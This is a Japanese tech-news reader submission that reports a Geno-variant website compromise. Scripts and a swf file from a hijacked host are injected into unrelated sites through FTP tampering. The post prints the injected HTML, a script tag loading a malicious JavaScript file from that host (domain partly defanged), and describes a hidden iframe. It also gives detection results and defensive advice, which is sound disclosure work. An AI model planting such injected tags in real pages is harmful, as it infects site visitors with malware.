パスワードを忘れた? アカウント作成
145676 submission
セキュリティ

Geno亜種っぽいが定義検出はほとんどスルー

タレコミ by pluto
pluto 曰く、

とタイトルを派手に訴えてしまったが、ノートンのヒューリスティック検出にスクリプトがひっかかり発覚した。
これがなければ発見がさらに遅れていた可能性がある。
今後さらに被害が広がる or すでに広がっている可能性もあり注意が必要だ。
確認できたのはswfファイルであったが、どの脆弱性を利用しているかは不明、攻撃成功後の動作(何をインストールするのか等)についても不明である。
例によってFTP経由での改ざんの模様。

loan-5●sakura●ne●jp/bank-loan/以下にあるスクリプトとswfファイルを全く関係ないサイトへ注入する方式。jpドメインのため気づかれにくく、タレこみ子も最初は見逃してしまっていた。

--補足--ココカラ--
iframe width='100' height='0'によって埋め込む。
FlashPlayerを未インストールのクライアントにはインストールを促す。
このとき、download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0というリンクでのインストールは古いバージョンをDLするように促しているのかもしれない。確認したところ最新版のような署名であったがインストールまではしていないので不明。
--補足--ココマデ--

ここで問題なのはbank-loan自体もおそらく乗っ取られているということだ。
つまりbank-loanだけでなく、他のサイトにもスクリプトファイルが置いてある可能性がある。
そのうち被害サイトへ直接置くものも出てくるかもしれないので注意が必要だ。
こうなるとNoScriptでも防ぎにくくなる。

--補足--ココカラ--
これは以前のGeno騒動時に負荷が集中してしまったサーバーへの負荷分散が目的だと推測される。
こうするくらいなら直接乗っ取りサーバーにスクリプト、swfファイルを置いても良いのではと思われるが、転送負荷やスクリプト更新に対する負荷増などの問題があるのかもしれない。
--補足--ココマデ--

注入部分は以下のとおりであった。
script行については何の細工もされていない。
まだ初期段階だった可能性があり今後細工が施されるのかもしれないが、このやり方の場合、少なくとも初回は細工なしのほうが良いと判断したのかもしれない。

<ul>
<li>本文</li>
<li>本文</li>
  ・・・
<li>本文</li>
</ul><script src=http://loan-5●sakura●ne●jp/bank-loan/google_service.js></script>
<p>本文</p>

スクリプトとswfファイルの検出結果は以下のとおり。未検出ベンダーへは有志が提出中[2ch.net]

google_service.js(1/41)[VirusTotal]
ad_top.swf(3/41)[VirusTotal]

予防方法としては、
クライアント側:Adobe製品の更新(Genoと同じ)
サーバー側:FTPではなくセキュアな通信を使う(FTPしかできないところはマメにチェックするしかない?)

以下、個人の感想とか。
F-Secureは提出から1時間で返事がきてて驚きました。

Genoのときと同様に確定事項が少なくて記事にしにくいです。ほんとごめんなさい。
1つ目の補足はHTML、jsそれぞれのソースからですが、2つ目のは勝手な推測+個人的な感想です。

当初の状況から限りなく黒に近かったもののMicrosoft以外はすべてスルーでした。
そのため本当に黒かわからなくて、F-Secureの結果でやっぱり黒かなーと判断しました。
swfについてはAVGも黒判定してるし、もう黒でよさそう。
被害にあったサイトで確認できているのは1つの個人サイトだけで、それもすでに修正済み+閉鎖直前なので混乱を防ぐために載せていません。
他はまだ見つかってないだけかも・・・。

結局はGenoの亜種なんでたれこみにしていいか迷ったけどたれこみ。
修正済みの脆弱性だとしたらもう/.jpのみんなは対策してるよね。

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
typodupeerror

計算機科学者とは、壊れていないものを修理する人々のことである

読み込み中...